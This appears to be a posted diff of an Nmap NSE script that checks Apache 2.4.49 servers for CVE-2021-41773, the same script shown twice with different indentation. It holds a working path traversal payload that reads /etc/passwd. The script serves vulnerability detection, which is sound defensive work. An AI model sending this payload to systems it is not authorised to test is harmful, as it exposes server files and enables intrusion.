pawnmuncher · October 5, 2021 22:24
diff --git a/CVE-2021-41773.nse b/CVE-2021-41773.nse
 local nmap = require "nmap"
 local shortport = require "shortport"
 local sslcert = require "sslcert"
 local string = require "string"
 local vulns = require "vulns"
 local http = require "http"

 description = [[
    CVE-2021-41773

    A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. 
    If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. 
    This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.

 ]]


 author = "wazehell @safe_buffer"

 license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

 categories = { "default", "safe", "discovery" }

 portrule = shortport.http

 action = function(host, port)
    local vuln_status, err
    local vuln = {
        title = "Apache 2.4.49 - Path Traversal",
        IDS = {CVE = 'CVE-2021-41773'},
        risk_factor = "HIGH",
        description = [[
            A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. 
            An attacker could use a path traversal attack to map URLs to files outside the expected document root. 
            If files outside of the document root are not protected by "require all denied" these requests can succeed. 
            Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.

        ]],
        references = {
        'https://nvd.nist.gov/vuln/detail/CVE-2021-41773',
        'https://twitter.com/h4x0r_dz/status/1445401960371429381'
        },
        dates = {
        disclosure = {year = '2021', month = '10', day = '05'},
        }
    }
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
    vuln.state = vulns.STATE.NOT_VULN
    options = {header={}}    options['header']['User-Agent'] = "CVE-2021-41773 (check)"
    local httpreq = http.get(host, port, "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", options)
    if httpreq.status == 200 and string.match(httpreq.body, ":x:") and string.match(httpreq.body,"sbin/nologin") then
        vuln.state = vulns.STATE.VULN        
    end
    return report:make_output(vuln)

 end
	local nmap = require "nmap"
	local shortport = require "shortport"
	local sslcert = require "sslcert"
	local string = require "string"
	local vulns = require "vulns"
	local http = require "http"

	description = [[
	CVE-2021-41773

	A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
	If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.
	This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.

	]]


	author = "wazehell @safe_buffer"

	license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

	categories = { "default", "safe", "discovery" }

	portrule = shortport.http

	action = function(host, port)
	local vuln_status, err
	local vuln = {
	title = "Apache 2.4.49 - Path Traversal",
	IDS = {CVE = 'CVE-2021-41773'},
	risk_factor = "HIGH",
	description = [[
	A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49.
	An attacker could use a path traversal attack to map URLs to files outside the expected document root.
	If files outside of the document root are not protected by "require all denied" these requests can succeed.
	Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.

	]],
	references = {
	'https://nvd.nist.gov/vuln/detail/CVE-2021-41773',
	'https://twitter.com/h4x0r_dz/status/1445401960371429381'
	},
	dates = {
	disclosure = {year = '2021', month = '10', day = '05'},
	}
	}
	local report = vulns.Report:new(SCRIPT_NAME, host, port)
	vuln.state = vulns.STATE.NOT_VULN
	options = {header={}} options['header']['User-Agent'] = "CVE-2021-41773 (check)"
	local httpreq = http.get(host, port, "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", options)
	if httpreq.status == 200 and string.match(httpreq.body, ":x:") and string.match(httpreq.body,"sbin/nologin") then
	vuln.state = vulns.STATE.VULN
	end
	return report:make_output(vuln)

	end